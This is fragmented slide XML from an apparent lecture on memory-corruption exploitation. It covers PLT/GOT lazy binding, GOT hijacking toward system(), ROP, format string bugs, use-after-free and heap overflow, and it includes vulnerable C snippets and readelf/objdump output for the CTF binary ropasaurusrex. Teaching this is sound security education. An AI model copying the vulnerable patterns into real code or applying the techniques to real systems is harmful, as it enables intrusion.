          <p:cNvPr id="967" name="Shape 967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8" name="Shape 968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foo@plt+6</a:t>
            </a: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971" name="Shape 971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call _fix_up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 0xc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2" name="Shape 972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973" name="Shape 973"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675" y="1173450"/>
            <a:ext cx="1290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dl_resolve</a:t>
            </a:r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75" name="Shape 975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sp>
        <p:nvSpPr>
          <p:cNvPr id="976" name="Shape 976"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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symbol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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="982" name="Shape 982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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985" name="Shape 985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986" name="Shape 986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 _fix_up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ret 0xc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7" name="Shape 987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988" name="Shape 988"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675" y="1173450"/>
            <a:ext cx="1290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dl_resolve</a:t>
            </a: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90" name="Shape 990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sp>
        <p:nvSpPr>
          <p:cNvPr id="991" name="Shape 991"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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the real address of foo() into the got entry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Overflow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ROP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Stack pivot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GOT hijacking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DynELF library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 String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UAF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Heap Overflow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Fastbin</a:t>
            </a:r>
            <a:endParaRPr/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Unlink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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="997" name="Shape 997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999" name="Shape 999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1001" name="Shape 1001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*(foo@GOT)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index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PLT0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525155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*(GOT+4)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*(GOT+8)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3" name="Shape 1003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1004" name="Shape 1004"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1005" name="Shape 1005"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t>
            </a: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007" name="Shape 1007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sp>
        <p:nvSpPr>
          <p:cNvPr id="1008" name="Shape 1008"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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foo() is invoked for the second time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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1014" name="Shape 1014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5" name="Shape 1015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1018" name="Shape 1018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jmp *(foo@GOT)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index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PLT0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9" name="Shape 1019"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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*(GOT+8)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0" name="Shape 1020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1021" name="Shape 1021"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022" name="Shape 1022"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t>
            </a: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024" name="Shape 1024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sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Shape 1025"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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directly to the library function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GOT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Shape 1031"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445900" y="1254775"/>
            <a:ext cx="7051500" cy="312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objdump -R ropasaurusrex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ropasaurusrex:     file format elf32-i386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DYNAMIC RELOCATION RECORDS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OFFSET   TYPE              VALUE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08049600 R_386_GLOB_DAT    __gmon_start__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08049610 R_386_JUMP_SLOT   __gmon_start__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08049614 R_386_JUMP_SLOT   write@GLIBC_2.0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08049618 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0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0804961c R_386_JUMP_SLOT   read@GLIBC_2.0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hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1037" name="Shape 1037"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="85206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 must be writable if lazy binding is enforced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write bug can be used to overwrite GOT and control PC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1038" name="Shape 1038"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1959925"/>
            <a:ext cx="8347800" cy="286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readelf -S ropasaurusrex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There are 28 section headers, starting at offset 0x724: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Section Headers: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[Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al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[23] .got.plt          PROGBITS        08049604 000604 00001c 04  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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WA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0   0  4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Key to Flags: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 (write)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, A (alloc), X (execute), M (merge), S (strings)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I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)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O (extra OS processing required) o (OS specific), p (processor specific)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hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044" name="Shape 1044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highlight>
                  <a:srgbClr val="999999"/>
                </a:highlight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5" name="Shape 1045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1048" name="Shape 1048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*(foo@GOT)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index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PLT0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9" name="Shape 1049"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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*(GOT+8)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0" name="Shape 1050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1051" name="Shape 1051"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Shape 1052"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Shape 1053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054" name="Shape 1054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hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Shape 1060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999999"/>
                </a:highlight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 b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="99999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1" name="Shape 1061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063" name="Shape 1063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1064" name="Shape 1064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*(foo@GOT)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index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PLT0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5" name="Shape 1065"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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*(GOT+8)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6" name="Shape 1066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1067" name="Shape 1067"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Shape 1068"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t>
            </a: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070" name="Shape 1070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sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="Shape 1071"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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foo@got is overwritten to address of system()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hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Shape 1077"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99780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 foo@plt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8" name="Shape 1078"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055250" y="31578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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1079" name="Shape 1079"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055250" y="3465075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080" name="Shape 1080"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055250" y="37722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1081" name="Shape 1081"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="66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index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PLT0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2" name="Shape 1082"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5251550" y="1524775"/>
            <a:ext cx="1686300" cy="10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*(GOT+4)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jmp *(GOT+8)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3" name="Shape 1083"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10552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1084" name="Shape 1084"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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foo@plt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Shape 1085"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5251550" y="1173450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PLT0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086" name="Shape 1086"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055250" y="4079475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087" name="Shape 1087"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111450" y="2827638"/>
            <a:ext cx="885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.got.plt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1088" name="Shape 1088"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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to system() function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Types</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Shape 10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Errors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Injections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Corruptions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Overflow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 Overflow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 String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After Free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Heap Overflow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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Shape 1100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2702275"/>
            <a:ext cx="85206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Anderson, J. P., Computer Security Technology Planning Study, ESD-TR-73-51, ESD/AFSC, Hanscom AFB, Bedford, MA (Oct. 1972) [NTIS AD-758 206]; Volumes I and II Seminal paper on computer security mechanisms (US Air Force)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Morris Worm (1988)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Smashing the Stack for Fun and Profit (Aleph One 1996)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1101" name="Shape 1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13" y="1403700"/>
            <a:ext cx="60102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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Shape 1107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538825" y="1763675"/>
            <a:ext cx="454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function(char *str)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buffer[16];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strcpy(buffer, str);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large_string[256];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i;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for( i = 0; i &lt; 255; i++)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large_string[i] = 'A';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function(large_string);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8" name="Shape 1108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625375" y="1208575"/>
            <a:ext cx="5459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 used in &lt;Smashing the Stack for Fun and Profit&gt;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List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overflow, ROP, stack pivot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ropasaurusrex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, Plaid CTF 2013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string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Pwn200, SCTF 2016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mailbox, BCTF 2014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overflow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0ctf 2014, freenote modified version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after free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shitsco, DEFCON 2014 Quals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Shape 1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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114" name="Shape 1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European Space Agency spacecraft Cluster I's satellites exploded because of integer overflow (1996)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M. Dowd, C. Spencer, N. Metha, N. Herath, and H. Flake. Advanced Software Vulnerability Assessment. In Blackhat USA, August 2002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IO2BO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Array index out of bounds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5" name="Shape 1115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613825" y="3278000"/>
            <a:ext cx="3927900" cy="1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safe_memcpy(char *src, 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size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dst[512];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512)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memcpy(dst, src, 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6" name="Shape 1116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4918650" y="3281450"/>
            <a:ext cx="36045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safe_set_element(char *arr, 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index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char value, int arr_size)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arr_size)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arr[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value;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7" name="Shape 1117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871300" y="3056600"/>
            <a:ext cx="1152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IO2BO</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="Shape 1118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5028900" y="3056600"/>
            <a:ext cx="1765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index OOB</a:t>
            </a:r>
            <a:endParaRPr b="1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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Shape 1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been discovered since 1999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Format String Attacks, Newsham (2001)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use %x and %n to achieve arbitrary read and write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5" name="Shape 1125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="893800" y="2832100"/>
            <a:ext cx="2531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func(char *user)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printf(user);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6" name="Shape 1126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3870850" y="2832100"/>
            <a:ext cx="30591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func(char *user)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printf("%s", user);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7" name="Shape 1127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="893800" y="2600325"/>
            <a:ext cx="1470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Vulnerable</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128" name="Shape 1128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918675" y="2583175"/>
            <a:ext cx="1470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 Vulnerable</a:t>
            </a:r>
            <a:endParaRPr b="1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functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Shape 1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2860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fprintf - prints to a FILE stream</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="22860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printf - prints to the ‘stdout’ stream</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="22860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sprintf - prints into a string</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="22860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snprintf - prints into a string with length checking</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="22860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vfprintf - print to a FILE stream from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="22860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vprintf - prints to ‘stdout’ from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="22860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vsprintf - prints to a string from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="22860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vsnprintf - prints to a string with length checking from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="22860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setproctitle - set argv[]</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="2286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• syslog - output to the syslog facility</a:t>
            </a:r>
            <a:endParaRPr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After Free</a:t>
            </a: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4573175" y="1215550"/>
            <a:ext cx="15243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 = malloc(32)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141" name="Shape 1141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="937000" y="1337725"/>
            <a:ext cx="3100500" cy="4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malloc(32)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st-&gt;function = handler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2" name="Shape 1142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="937000" y="2124525"/>
            <a:ext cx="3100500" cy="28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malloc(16)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3" name="Shape 1143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993850" y="4470725"/>
            <a:ext cx="2973000" cy="28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st-&gt;function()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4" name="Shape 1144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="937000" y="3750775"/>
            <a:ext cx="3100500" cy="4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buf = malloc(32)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memcpy(buf, user_data, 32)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5" name="Shape 1145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3292475" y="2844325"/>
            <a:ext cx="1596900" cy="28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free(st)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46" name="Shape 1146"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1141" idx="2"/>
            <a:endCxn id="1142" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487250" y="1804525"/>
            <a:ext cx="0" cy="32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7" name="Shape 1147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253100" y="2844325"/>
            <a:ext cx="856500" cy="28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8" name="Shape 1148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266225" y="2844325"/>
            <a:ext cx="856500" cy="28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9" name="Shape 1149"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279350" y="2844325"/>
            <a:ext cx="856500" cy="28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0" name="Shape 1150"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1142" idx="2"/>
            <a:endCxn id="1147" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="681250" y="2409225"/>
            <a:ext cx="1806000" cy="4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1" name="Shape 1151"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1142" idx="2"/>
            <a:endCxn id="1148" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1694350" y="2409225"/>
            <a:ext cx="792900" cy="4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Shape 1152"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1142" idx="2"/>
            <a:endCxn id="1149" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487250" y="2409225"/>
            <a:ext cx="220500" cy="4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3" name="Shape 1153"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1142" idx="2"/>
            <a:endCxn id="1145" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487250" y="2409225"/>
            <a:ext cx="1603800" cy="43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4" name="Shape 1154"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1147" idx="2"/>
            <a:endCxn id="1144" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681350" y="3129025"/>
            <a:ext cx="1806000" cy="6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Shape 1155"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1148" idx="2"/>
            <a:endCxn id="1144" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1694475" y="3129025"/>
            <a:ext cx="792900" cy="6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Shape 1156"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1149" idx="2"/>
            <a:endCxn id="1144" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2487400" y="3129025"/>
            <a:ext cx="220200" cy="6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Shape 1157"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1145" idx="2"/>
            <a:endCxn id="1144" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2487125" y="3129025"/>
            <a:ext cx="1603800" cy="62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Shape 1158"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1144" idx="2"/>
            <a:endCxn id="1143" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2480350" y="4217575"/>
            <a:ext cx="6900" cy="2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9" name="Shape 1159"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4272400" y="4453025"/>
            <a:ext cx="1524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After Free!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Shape 1160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6249950" y="1215550"/>
            <a:ext cx="9468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malloc(16)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Shape 1161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7349225" y="1215550"/>
            <a:ext cx="1524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buf = malloc(32)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user_data</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162" name="Shape 1162"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4573175" y="1941875"/>
            <a:ext cx="1524300" cy="3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 = malloc(32)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Shape 1163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6249950" y="1960075"/>
            <a:ext cx="94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malloc(16)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164" name="Shape 1164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4573175" y="2266275"/>
            <a:ext cx="1524300" cy="284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user_data</a:t>
            </a:r>
            <a:endParaRPr sz="12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Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="Shape 1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Vudo Malloc Tricks, 2001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Once Upon A free(), 2001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Malloc Maleficarum, 2005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MALLOC DES-MALEFICARUM, 2009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New techniques are invented in CTF contests，2014 hack.lu oreo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1" name="Shape 1171"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487375" y="2945550"/>
            <a:ext cx="52575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#define BUFSIZE 256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main(int argc, char **argv)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char *buf;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buf = (char*)malloc(sizeof(char)*BUFSIZE);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strcpy(buf, argv[1]);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Discovery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Shape 1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Analysis（气宗）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Review - open source bug find (the simplest way is grep, Coverity, research institute)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Reverse Engineering - (Lokihardt windows edge - uninitialized stack variable)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Analysis （剑宗）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Fuzzing - (Keen Team - Pingpong root, Google Project Zero, CGC)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Symbolic Execution (PPP, shellphish)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Analysis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Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
